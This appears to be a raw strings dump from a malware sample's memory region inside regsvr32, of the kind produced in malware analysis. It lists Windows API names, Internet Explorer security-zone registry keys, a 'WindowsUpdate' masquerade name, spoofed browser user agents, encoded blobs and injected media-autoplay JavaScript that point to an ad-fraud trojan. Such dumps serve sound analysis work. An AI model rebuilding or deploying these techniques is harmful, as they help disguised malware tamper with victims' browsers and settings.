RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyW
RegCreateKeyA
RegCreateKeyA
version.dll
version.dll
gdi32.dll
gdi32.dll
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationA
OpenWindowStationA
EnumChildWindows
EnumChildWindows
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
ole32.dll
ole32.dll
wsock32.dll
wsock32.dll
winmm.dll
winmm.dll
atl.dll
atl.dll
wtsapi32.dll
wtsapi32.dll
Wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
PSAPI.DLL
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
NtQueryValueKey
NtQueryValueKey
NtDeleteValueKey
NtDeleteValueKey
NtSetValueKey
NtSetValueKey
urlmon.dll
urlmon.dll
UrlMkSetSessionOption
UrlMkSetSessionOption
4"4,414?4
4"4,414?4
4,41494^4
4,41494^4
6%6X6v6
6%6X6v6
0%0-0e0m0u0}0
0%0-0e0m0u0}0
6v7U7\7j7
6v7U7\7j7
2QmAhnpu8fcGUPYZyHeQyChZMoQ/D5d5AZr0RMKkXSBpgoUeQA68kGNIt5xXrV6o8QS8z0K4M8/acNmHet3lgIpPfrM3KHMJVLHZV5gnlYIpq 3Std7mjXltyWOmlU01mcpaju/he1E2Lz04lkhk4ZVxPeg8DJMsTwXfEuMRo4pdRHI0NadevziCU4xjImH/yoUssKerbXMn1wMORwlp/k0 VVrGyYSi4vdLFS3UlXgbi1095arJ1fxvwbnnkviDbAcwVpdWbk 2DklaltjFVzYEU5 2iYATMPlxyE8aSpdfm/SECMCEd244OvjLbc39VZhixL6gBxt4 CnPjHQDoKsoiFZfDyvSE1iwVxoacXcReLFkhoWojYggw3ep Hhk1fFrZWukcbDRTysyv4A RV0UvVSiLsWRR5x1Q6TCMH9JLuCmg165bGfo5b0K0LNDkwOZYhhy1i2qIVkvrmwb9r1Jga8ezq 3dis40etEfUBKCKEphbjj7OhN//CNc0l 73xqZrpYNfV6sAlZvdg95xbgvnsjAMqrsn9mGidK 0QlV2ndhTdo7G3y93rYEcmeR8I18yzTGloiKWTC5 t5PptwGlywmqQTrAc85b6yvfh7pz/ xRwLfLGZtQpvpgeognCnQVctWgg8tJ24W8sytOHljZ5M5LSNO133on8yS40zNvYIu4sDcbQ WmDEL0ZGF EQiG6FyxUotVY LsAh/gH9MWC6mU0Wd3ZgehfYWzSTTfjjqKQLyo9DnEsw8NGN5mDI2vvNqxmB13E2I /4JpjW8UZbcHj6CTf2yBWAllS3cIGKS7RhsQ6KtsLTZFqPzHiQQJ08tG0Wc5UIH r9CgaTkAZUoPZ1GeSNBBHinj3owfCFkhHSIOnL7xFDJRYhlC6Ozw/do2V8/tFGMmApiBcKA3fabVwTpBWKL/zH6QpTSqYfJ6FeFwLoIhMLhSaQHcoGUJDhjwiELkqPL8DzEKSDaJpkDdeUnnYmixASN BvhpyyD XtW6udDeLIdWGSXrXbK43XFT58KWGP/Ae213bAGSGezZWFuw9EPRblSqqaZtk4moTw/etWmK58MKzQmaoc2XI0g1IEg4/l4q0 uYFooQFoVZ8a6/G2gM4uBpKGjj1CF1RWNxoId/FFEg8s2Ppg62D2Mcpe xI3n9eh3sXIYoLTlHEJB8KQi6/LCbDhUO0N5SsgwaLxWhy1lo1f38VhLX5x8kDXMJDETRpwPGoUojilI7bYbFfYR6Ylrl8pdBf9zHbho4zif23dQACP99TXtSUwQXD8xp3jsbDDdeL1hK7ioOndBDpLClwpvCSHwh52OPzdx9N3 Wk/XqDDgRxhMesca 0S2DM9 kZubOrLoiAgX9o1CcsMn9eIY zLWsTazbdNPvEUNj6SKJIjRVnKZltFsKUkPOdgUHk/j05chZ24pbF20a3pNdXvNoEAShCaMyfJV2v/0WE02YcJw8rVpriebDi3dPjCn0S baITraQLe5yAXpB5LXLzAvvGwvDSBsVpp8u8H2UVC97KSX3N42CxO61VFmPxWHApPqLSGQw30DHSV/nfVEAfKR3YMOFRWvwmfbIFKl4l0siRF3LNOPowDEUNvFypVzaPOkYxeIZVT3x8h6ZTC2ldtbx984jHuMCuY1lY5xaUMWtuvBP4HYonozcjueFSS9dceXJ2LDTdC8fppm/q8yhQOT/i2m096Fv5Jk3swvPtGyiWW8LEkjwIhaI7aLSlfC00KSDl9UpCRdrYFVg0mtJIxoJiw76B66wNirFwVWTsAqviTPweIumnhKdRVRyPVGbmlKfaDqwz8xS9yM2C5dxazuQBmUwOWfDICcyXLyDpLFAnEOvC1TJ99bFBIB2W29wz11XU3EHkrQ8tTocRVE8Ewz QHCJLxF e3n85lsPxHBYmweu6b06GOipn0B9AbHaRKnZNB3orJnjT5bgnGJfnbWJ0MkH4y/H7vhLw 3z30b6Rx8RAeMhwmpsmZOHWPKZKKGJ2401ZIcESIkw XRajBY3o5lhHlCoe8eDQwP MhPHhC15i/k8A9jW6PId23MPyzLMRABYvVW7ObyisEWeIcvNZuhNnPZqAwbfVNujSyyzCY5lHnAQhBjIQWdbd GHZYC/a sXVkmkcMoEJC9/wCMLn0bYSLmNyyXjbI1gt njxbQB5kPyflr/IWNkdyo37FBg9Bj9aTTkLcnZMA/lKUQqiLksyx1md6EFapDKrpfI1OTVeqAli17WDBVF1P4kTsTdFs1oSKb2yssAlFuW4ADQ80ccCUPD4PpCBsteHKT5O4qtiS8wVanr3bzCsQzIvj1JQk/Vs7ta4yRPjXYlC/QSviTL9oEKh3vNQZv/9SEZocqBAMSQni0RdlMtc/1UDWBH8 rApgq69I3LLe75NC/R/t3B8WffKF0Xwg qqhNUNue6vzmD1/r3a4RtGgDGifuiQ FmF4NACyciA9I 90 KjaEHSbZ02T6cqGIjvAERyepxBIegZPAMdRN0hM0JZAm6t42jzUyn4cJAlRDY7PbeP7A3etyY694guefwC6cRF3djZhAUKau2MqoSIlM9ZfHcMlIy0ju1lTn6TuiHVqFMEoZl9FFO0sPW5MmRn7aUgQVq644zEQ4ZinDTpvROeVeCTgPOOZjo6DiMtwwwTs7EWT7AVn3 f7uSDPLw6hTx9baJJ88ZvSTMeloTZz8uhjig4Fr8H7ZhjhrdtToS/Uvvan980QyoLlwvutx7zkLAwzU8ZFyJeYNVCreppmX1ERsc3nXs3 q4P8l1aUVKcSdqQWbz/PC4N9nD608OoOXDlRzxG6 VJZ7/eqS9MX5JAASOMrZ1RLZ iFfKeeue5hoJVXb2vFiUlWzDQ5/FSXR 8KYdQRg2xuRHnhOWtXG0oxmXmcIOinppThzK NGKHZEG5ZbiqrB6AhMvqv8GpaLs5ZFH/9hzd8HUQLgOUKDRoVVqgbXhCApa/GrcLXat5BE rkXKNa dsIJbpjppZ1xZ3nZ1rC7MO1qfm9//ymApylmBnXXv5IfrFR/teh HbaCUYl17xjZoOoeMUqOvS73bzixbywl97l ecwB PIrq0ftaliY2PL39/4bINwRfjvgdTjOLX2naBQIA8WcangImCoYH4wUXjmVRPSJh4foNftFtUrxT MkaC4Oeu1NqENQNPxmUgnYo8F9YDcnBIz4pZatOStPT2vdDfVL4Fag9RkB F7B5aprbDoTEBTbX9mAamCjOZ/0wurCeaP JAsNPrp3lUCbtWuKKp9w8X7w0i7nEmad6RLEh2DayCf0eJKV1R/5agf4Gvc5aiC2xRp4WQhnjoCs4vrNZbpCyifRoA4rjxxD S5FuxwrGYlcy7zkbcOaQsWiRSZBo9spuic/mjkhlbIp8GzaPU0uIXjfL6d8Ulq9KPhHlb9r/oHwgCBuTOup4Q2uoqM9jvYw1i7MoIv3RRf8YzVSCRw QlJXcaHHnqdDnhPaBNBh4mkzQ fRblsl4LdoJc1YFTF56Dm ZvOEZH1j7hGNkRs2akeGX6vHvSn3E0c5s wFrbDjD gvl6v/e414Xvog3K7sY1yGxGrIOtt5POiG4o/FtEFmkZCtgfEepTnnLdbzZoONhzywCN75 T6usIuaFeiinI/m4z9 7nIT oDlaEtGwwzDAadqvZAmzRzNTCcU3Ykt4xIh7C1y25K7iYFzoEsWHxQKdPGT3Zgmm28qIC 7/dAwvl asVNW7VWPbdMBQABK DB4d8md3yKri/f1KPH2yY3Jry3zkl/EqJPUeSO3fDSJUDWEwe 4k0QveWcNr9KchSnnhL4TNzJxnHnRsjunajxd8qc4HuWHDMjdzanWIpyMEFajntapZgNscR8ZHk699SW3GuJvykAjM/ZDyOCXmFGgWvW7/xLelvAG7pp9lThSwDaiD6EQT4xByqM7rctSPvOH1h6Kzc78CppXNWdn1ev4d49Vs/NJOf0I9mTOe XKF/sZM4daZVTt/CTivlhbMQiSKnI 2LchxwtU071RcSAKBC0N4aYagIEENLxEtbywgBBTsT hfUgfyPFzQLhgVT87NLcOWApc/r7IyiPZlcKRW9vWk y44xujeKVkmSMj1ck6X3G3cGD4qmm8EFWnc9CKOi9nSDz4Kbe34YCeJ WsMcEEBFeg93eNLg urf251uE2J4prpE5HL17sIA629h8hJ3HpsJ85e7oH5tvxRAprcKP76/lGv3KitfWcPpjDXHRzL86xpn543GPrilrlCTqqsgaB3FZqXiBMxjruFf3J80feF4i0pR 8ThAXGFADwY5VtNlc6QDxP27HwViApoLpM63D47xX1CtZcwM2L4tLBEjlgzGOMTVBmhgt9QO2visWAb2VN0Wm vM8VHLWeaUcVSrwqx9C4l4QylCmgUKQC/lMjiu bAKJWC0dyeETqhOnpdWzvjS5FS15 4KfpV4ZLhuzbaZvDaaJVyXIH8QE0j3mU/xrd98c8/SSLgAGeIdIoQfCA7FL0n30qFhhMv1a9Wv1xByL3h4j7dx2hTOhhSN1MFvbyou7nl9C4K77Ia cWuKk cOmJaKylkfX0JQEknlPC0q9c0jLzL xGRE2c0CSDKYe5GNC9YYRNHGN6PurACw2eQvSdUpsgaHSHhB8NydtTWZiIw8 bnITKflQKh9WzPAD7GRoa9joLy nKlyz1FUb/RVfQydCKMp5IGBYHAr8lNe6Hs7QkuWBVCZGDqV74zeVeAeZxkSaO6ABPhHXrhRttyYJKaa2e16xapeB/shfFVG/S8geyqXdQrVlR/m/1YtijOiIi0oBFln5TMLnemc6isRdJBZcp3PbAtVbXhfykb2/ZbxjFz2/i/q09UxOlqIL4nlNg8ppu40jRax c5QB3sfHJoMSgZa5sGK7iYGiWpXdBTM0TK0yc3F8FxuO1yIDnxVBeBj02N3cHBPVOdDS7FrLGDh5A3G4C4sGIbx3DmUe7snKiuvBx92eSI1bXQXVC8lMGuv9/dMI0W4aTyLdWAmWHT2nhQbS9/BcSXwcxXr8dMGjTXwQuTFPjyye3y/MhIz5R25k41zAkKayv/PVlYFXxOoovMCoUnfyOme20vlz3gPr0/EItd09L8FpoyEcSj1Qj3m eIs5d2jum1KPOYceU2941phMmFrAkJLZ2M7lBjsGzUIz36ulPVqiU7vDekBF3DardgJTGlVpgjsKTICwrR7b9VniFnBKfQX5rMT9vpLZXon7RNZJtjqe2qYMR2RdDZq2ra0lDffFxNmmGuTgQI6qgNLYERXc4l93/Y/RTplukg/u/kYWAf3wZIITfMXtHWqb8PzT5UmJynu4D2eQyoVRDFlkil7gG1DcSZGYdFsqKdPH4tSMOTJwYtkePYtwHGYKYL71CLlFeAPvJzOWzrOxRLfVe1lpkVpMPNcwY5jpM/h/wQMjoP3nVA7EEe2Rc/F7iLg7FeQFL15NYBjqs chgAxTO BDi31uCMPydHfs 72ggtPK1alJWlWV6/2amM0La0lj3eLOjwlOPoM/JCcuRPBIOOGILxHzfzQAcKlJ8N0 7U1eT50jitTLcIhqonwYgawzChExnjbljE3PlCn/yh7oXKyEPqDOUqpPlOdcXdygHqhPkryZ Oyq08RTe/buhaS s3aG40izuACX4lGAo4Vwtc99zVRkOKQztZ9hxSPmdvoogKkh6O0PoUXGhcWQGVcYo2yHU6w9CfydV7E8Cm2ynUbEEiOaPXois6s CeNRPC1VWusBNZ9lA3vY/7zB yGfYy5RZjXNZOqq8NHzdvZx1gqF2zNdPbN67Ze61iqdMupKURgLQbXCLTZ8P8ir3w9z0w9dxydkSrTwLI9wmqgw5fpFnevAV39oJsAyf5GJcIIcPKeG8rU6DkVDXZWI6BBimF2HBnnbYsNN/RXwd5fLLMLyUe5mkouZS4 XE2BmjIbWVno1TVoRSZqXZFAI108Sqy94zD2m8auf/n7edAA0bErhMR m6bSIGVD7YDgp3vIkGe/QFTiY2rzjC7ZhQ2yIITwA8fSKD7VQC/ZAzgixqrl4jL2muO9s wUYDGkxgUviFQlDNEPHk8 RlgMPew/L1eYhiJV NuSRdmLE2/rQfQ zBzdNg7RCmPjx132S40XtOwDfy1eLmV47Y1v/r/gdFKETzVNd5IXo21URoSVXiQZAnpih/4wqMqFfAHaiyIJ/pd9Rci5AbEaFDngNoGsOZ Xuyv5HPOZM1mNoXyoPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
2QmAhnpu8fcGUPYZyHeQyChZMoQ/D5d5AZr0RMKkXSBpgoUeQA68kGNIt5xXrV6o8QS8z0K4M8/acNmHet3lgIpPfrM3KHMJVLHZV5gnlYIpq 3Std7mjXltyWOmlU01mcpaju/he1E2Lz04lkhk4ZVxPeg8DJMsTwXfEuMRo4pdRHI0NadevziCU4xjImH/yoUssKerbXMn1wMORwlp/k0 VVrGyYSi4vdLFS3UlXgbi1095arJ1fxvwbnnkviDbAcwVpdWbk 2DklaltjFVzYEU5 2iYATMPlxyE8aSpdfm/SECMCEd244OvjLbc39VZhixL6gBxt4 CnPjHQDoKsoiFZfDyvSE1iwVxoacXcReLFkhoWojYggw3ep Hhk1fFrZWukcbDRTysyv4A RV0UvVSiLsWRR5x1Q6TCMH9JLuCmg165bGfo5b0K0LNDkwOZYhhy1i2qIVkvrmwb9r1Jga8ezq 3dis40etEfUBKCKEphbjj7OhN//CNc0l 73xqZrpYNfV6sAlZvdg95xbgvnsjAMqrsn9mGidK 0QlV2ndhTdo7G3y93rYEcmeR8I18yzTGloiKWTC5 t5PptwGlywmqQTrAc85b6yvfh7pz/ xRwLfLGZtQpvpgeognCnQVctWgg8tJ24W8sytOHljZ5M5LSNO133on8yS40zNvYIu4sDcbQ WmDEL0ZGF EQiG6FyxUotVY LsAh/gH9MWC6mU0Wd3ZgehfYWzSTTfjjqKQLyo9DnEsw8NGN5mDI2vvNqxmB13E2I /4JpjW8UZbcHj6CTf2yBWAllS3cIGKS7RhsQ6KtsLTZFqPzHiQQJ08tG0Wc5UIH r9CgaTkAZUoPZ1GeSNBBHinj3owfCFkhHSIOnL7xFDJRYhlC6Ozw/do2V8/tFGMmApiBcKA3fabVwTpBWKL/zH6QpTSqYfJ6FeFwLoIhMLhSaQHcoGUJDhjwiELkqPL8DzEKSDaJpkDdeUnnYmixASN BvhpyyD XtW6udDeLIdWGSXrXbK43XFT58KWGP/Ae213bAGSGezZWFuw9EPRblSqqaZtk4moTw/etWmK58MKzQmaoc2XI0g1IEg4/l4q0 uYFooQFoVZ8a6/G2gM4uBpKGjj1CF1RWNxoId/FFEg8s2Ppg62D2Mcpe xI3n9eh3sXIYoLTlHEJB8KQi6/LCbDhUO0N5SsgwaLxWhy1lo1f38VhLX5x8kDXMJDETRpwPGoUojilI7bYbFfYR6Ylrl8pdBf9zHbho4zif23dQACP99TXtSUwQXD8xp3jsbDDdeL1hK7ioOndBDpLClwpvCSHwh52OPzdx9N3 Wk/XqDDgRxhMesca 0S2DM9 kZubOrLoiAgX9o1CcsMn9eIY zLWsTazbdNPvEUNj6SKJIjRVnKZltFsKUkPOdgUHk/j05chZ24pbF20a3pNdXvNoEAShCaMyfJV2v/0WE02YcJw8rVpriebDi3dPjCn0S baITraQLe5yAXpB5LXLzAvvGwvDSBsVpp8u8H2UVC97KSX3N42CxO61VFmPxWHApPqLSGQw30DHSV/nfVEAfKR3YMOFRWvwmfbIFKl4l0siRF3LNOPowDEUNvFypVzaPOkYxeIZVT3x8h6ZTC2ldtbx984jHuMCuY1lY5xaUMWtuvBP4HYonozcjueFSS9dceXJ2LDTdC8fppm/q8yhQOT/i2m096Fv5Jk3swvPtGyiWW8LEkjwIhaI7aLSlfC00KSDl9UpCRdrYFVg0mtJIxoJiw76B66wNirFwVWTsAqviTPweIumnhKdRVRyPVGbmlKfaDqwz8xS9yM2C5dxazuQBmUwOWfDICcyXLyDpLFAnEOvC1TJ99bFBIB2W29wz11XU3EHkrQ8tTocRVE8Ewz QHCJLxF e3n85lsPxHBYmweu6b06GOipn0B9AbHaRKnZNB3orJnjT5bgnGJfnbWJ0MkH4y/H7vhLw 3z30b6Rx8RAeMhwmpsmZOHWPKZKKGJ2401ZIcESIkw XRajBY3o5lhHlCoe8eDQwP MhPHhC15i/k8A9jW6PId23MPyzLMRABYvVW7ObyisEWeIcvNZuhNnPZqAwbfVNujSyyzCY5lHnAQhBjIQWdbd GHZYC/a sXVkmkcMoEJC9/wCMLn0bYSLmNyyXjbI1gt njxbQB5kPyflr/IWNkdyo37FBg9Bj9aTTkLcnZMA/lKUQqiLksyx1md6EFapDKrpfI1OTVeqAli17WDBVF1P4kTsTdFs1oSKb2yssAlFuW4ADQ80ccCUPD4PpCBsteHKT5O4qtiS8wVanr3bzCsQzIvj1JQk/Vs7ta4yRPjXYlC/QSviTL9oEKh3vNQZv/9SEZocqBAMSQni0RdlMtc/1UDWBH8 rApgq69I3LLe75NC/R/t3B8WffKF0Xwg qqhNUNue6vzmD1/r3a4RtGgDGifuiQ FmF4NACyciA9I 90 KjaEHSbZ02T6cqGIjvAERyepxBIegZPAMdRN0hM0JZAm6t42jzUyn4cJAlRDY7PbeP7A3etyY694guefwC6cRF3djZhAUKau2MqoSIlM9ZfHcMlIy0ju1lTn6TuiHVqFMEoZl9FFO0sPW5MmRn7aUgQVq644zEQ4ZinDTpvROeVeCTgPOOZjo6DiMtwwwTs7EWT7AVn3 f7uSDPLw6hTx9baJJ88ZvSTMeloTZz8uhjig4Fr8H7ZhjhrdtToS/Uvvan980QyoLlwvutx7zkLAwzU8ZFyJeYNVCreppmX1ERsc3nXs3 q4P8l1aUVKcSdqQWbz/PC4N9nD608OoOXDlRzxG6 VJZ7/eqS9MX5JAASOMrZ1RLZ iFfKeeue5hoJVXb2vFiUlWzDQ5/FSXR 8KYdQRg2xuRHnhOWtXG0oxmXmcIOinppThzK NGKHZEG5ZbiqrB6AhMvqv8GpaLs5ZFH/9hzd8HUQLgOUKDRoVVqgbXhCApa/GrcLXat5BE rkXKNa dsIJbpjppZ1xZ3nZ1rC7MO1qfm9//ymApylmBnXXv5IfrFR/teh HbaCUYl17xjZoOoeMUqOvS73bzixbywl97l ecwB PIrq0ftaliY2PL39/4bINwRfjvgdTjOLX2naBQIA8WcangImCoYH4wUXjmVRPSJh4foNftFtUrxT MkaC4Oeu1NqENQNPxmUgnYo8F9YDcnBIz4pZatOStPT2vdDfVL4Fag9RkB F7B5aprbDoTEBTbX9mAamCjOZ/0wurCeaP JAsNPrp3lUCbtWuKKp9w8X7w0i7nEmad6RLEh2DayCf0eJKV1R/5agf4Gvc5aiC2xRp4WQhnjoCs4vrNZbpCyifRoA4rjxxD S5FuxwrGYlcy7zkbcOaQsWiRSZBo9spuic/mjkhlbIp8GzaPU0uIXjfL6d8Ulq9KPhHlb9r/oHwgCBuTOup4Q2uoqM9jvYw1i7MoIv3RRf8YzVSCRw QlJXcaHHnqdDnhPaBNBh4mkzQ fRblsl4LdoJc1YFTF56Dm ZvOEZH1j7hGNkRs2akeGX6vHvSn3E0c5s wFrbDjD gvl6v/e414Xvog3K7sY1yGxGrIOtt5POiG4o/FtEFmkZCtgfEepTnnLdbzZoONhzywCN75 T6usIuaFeiinI/m4z9 7nIT oDlaEtGwwzDAadqvZAmzRzNTCcU3Ykt4xIh7C1y25K7iYFzoEsWHxQKdPGT3Zgmm28qIC 7/dAwvl asVNW7VWPbdMBQABK DB4d8md3yKri/f1KPH2yY3Jry3zkl/EqJPUeSO3fDSJUDWEwe 4k0QveWcNr9KchSnnhL4TNzJxnHnRsjunajxd8qc4HuWHDMjdzanWIpyMEFajntapZgNscR8ZHk699SW3GuJvykAjM/ZDyOCXmFGgWvW7/xLelvAG7pp9lThSwDaiD6EQT4xByqM7rctSPvOH1h6Kzc78CppXNWdn1ev4d49Vs/NJOf0I9mTOe XKF/sZM4daZVTt/CTivlhbMQiSKnI 2LchxwtU071RcSAKBC0N4aYagIEENLxEtbywgBBTsT hfUgfyPFzQLhgVT87NLcOWApc/r7IyiPZlcKRW9vWk y44xujeKVkmSMj1ck6X3G3cGD4qmm8EFWnc9CKOi9nSDz4Kbe34YCeJ WsMcEEBFeg93eNLg urf251uE2J4prpE5HL17sIA629h8hJ3HpsJ85e7oH5tvxRAprcKP76/lGv3KitfWcPpjDXHRzL86xpn543GPrilrlCTqqsgaB3FZqXiBMxjruFf3J80feF4i0pR 8ThAXGFADwY5VtNlc6QDxP27HwViApoLpM63D47xX1CtZcwM2L4tLBEjlgzGOMTVBmhgt9QO2visWAb2VN0Wm vM8VHLWeaUcVSrwqx9C4l4QylCmgUKQC/lMjiu bAKJWC0dyeETqhOnpdWzvjS5FS15 4KfpV4ZLhuzbaZvDaaJVyXIH8QE0j3mU/xrd98c8/SSLgAGeIdIoQfCA7FL0n30qFhhMv1a9Wv1xByL3h4j7dx2hTOhhSN1MFvbyou7nl9C4K77Ia cWuKk cOmJaKylkfX0JQEknlPC0q9c0jLzL xGRE2c0CSDKYe5GNC9YYRNHGN6PurACw2eQvSdUpsgaHSHhB8NydtTWZiIw8 bnITKflQKh9WzPAD7GRoa9joLy nKlyz1FUb/RVfQydCKMp5IGBYHAr8lNe6Hs7QkuWBVCZGDqV74zeVeAeZxkSaO6ABPhHXrhRttyYJKaa2e16xapeB/shfFVG/S8geyqXdQrVlR/m/1YtijOiIi0oBFln5TMLnemc6isRdJBZcp3PbAtVbXhfykb2/ZbxjFz2/i/q09UxOlqIL4nlNg8ppu40jRax c5QB3sfHJoMSgZa5sGK7iYGiWpXdBTM0TK0yc3F8FxuO1yIDnxVBeBj02N3cHBPVOdDS7FrLGDh5A3G4C4sGIbx3DmUe7snKiuvBx92eSI1bXQXVC8lMGuv9/dMI0W4aTyLdWAmWHT2nhQbS9/BcSXwcxXr8dMGjTXwQuTFPjyye3y/MhIz5R25k41zAkKayv/PVlYFXxOoovMCoUnfyOme20vlz3gPr0/EItd09L8FpoyEcSj1Qj3m eIs5d2jum1KPOYceU2941phMmFrAkJLZ2M7lBjsGzUIz36ulPVqiU7vDekBF3DardgJTGlVpgjsKTICwrR7b9VniFnBKfQX5rMT9vpLZXon7RNZJtjqe2qYMR2RdDZq2ra0lDffFxNmmGuTgQI6qgNLYERXc4l93/Y/RTplukg/u/kYWAf3wZIITfMXtHWqb8PzT5UmJynu4D2eQyoVRDFlkil7gG1DcSZGYdFsqKdPH4tSMOTJwYtkePYtwHGYKYL71CLlFeAPvJzOWzrOxRLfVe1lpkVpMPNcwY5jpM/h/wQMjoP3nVA7EEe2Rc/F7iLg7FeQFL15NYBjqs chgAxTO BDi31uCMPydHfs 72ggtPK1alJWlWV6/2amM0La0lj3eLOjwlOPoM/JCcuRPBIOOGILxHzfzQAcKlJ8N0 7U1eT50jitTLcIhqonwYgawzChExnjbljE3PlCn/yh7oXKyEPqDOUqpPlOdcXdygHqhPkryZ Oyq08RTe/buhaS s3aG40izuACX4lGAo4Vwtc99zVRkOKQztZ9hxSPmdvoogKkh6O0PoUXGhcWQGVcYo2yHU6w9CfydV7E8Cm2ynUbEEiOaPXois6s CeNRPC1VWusBNZ9lA3vY/7zB yGfYy5RZjXNZOqq8NHzdvZx1gqF2zNdPbN67Ze61iqdMupKURgLQbXCLTZ8P8ir3w9z0w9dxydkSrTwLI9wmqgw5fpFnevAV39oJsAyf5GJcIIcPKeG8rU6DkVDXZWI6BBimF2HBnnbYsNN/RXwd5fLLMLyUe5mkouZS4 XE2BmjIbWVno1TVoRSZqXZFAI108Sqy94zD2m8auf/n7edAA0bErhMR m6bSIGVD7YDgp3vIkGe/QFTiY2rzjC7ZhQ2yIITwA8fSKD7VQC/ZAzgixqrl4jL2muO9s wUYDGkxgUviFQlDNEPHk8 RlgMPew/L1eYhiJV NuSRdmLE2/rQfQ zBzdNg7RCmPjx132S40XtOwDfy1eLmV47Y1v/r/gdFKETzVNd5IXo21URoSVXiQZAnpih/4wqMqFfAHaiyIJ/pd9Rci5AbEaFDngNoGsOZ Xuyv5HPOZM1mNoXyoPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
WindowsUpdate
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
regsvr32.exe_2024_rwx_00080000_0013E000:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
USER32.DLL
USER32.DLL
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowser
IWebBrowserApp
IWebBrowserApp
IWebBrowser2
IWebBrowser2
.length;
.length;
